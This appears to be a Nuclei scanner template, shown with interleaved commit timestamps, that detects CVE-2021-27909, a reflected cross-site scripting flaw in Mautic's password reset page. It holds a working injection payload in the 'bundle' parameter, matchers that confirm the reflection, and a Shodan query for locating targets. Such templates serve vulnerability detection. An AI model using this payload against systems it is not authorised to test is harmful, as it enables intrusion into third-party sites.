2022-10-13 09:55:31 +00:00
id : CVE-2021-27909
info :
name : Mautic - Cross-Site Scripting
2022-10-13 10:20:32 +00:00
author : kiransau
2022-10-13 09:55:31 +00:00
severity : medium
description : Mautic versions prior to 3.3.4 are vulnerable to reflected XSS on password reset page where a vulnerable parameter, "bundle," in the URL could allow an attacker to execute Javascript code.
reference :
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
2022-10-14 11:03:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
2022-10-13 09:55:31 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
cvss-score : 6.1
cwe-id : CWE-79
2022-10-13 10:53:06 +00:00
metadata :
verified : true
shodan-query : title:"Mautic"
2022-10-13 10:53:39 +00:00
tags : cve,cve2021,mautic,xss
2022-10-13 09:55:31 +00:00
requests :
- method : GET
path :
2022-10-13 10:53:06 +00:00
- "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"
2022-10-13 09:55:31 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-10-13 10:53:06 +00:00
- "'';alert(document.domain);var ok='"
- 'mauticBasePath'
2022-10-13 09:55:31 +00:00
condition : and
- type : word
part : header
words :
- "text/html"
2022-10-13 10:53:06 +00:00
- type : status
status :
- 200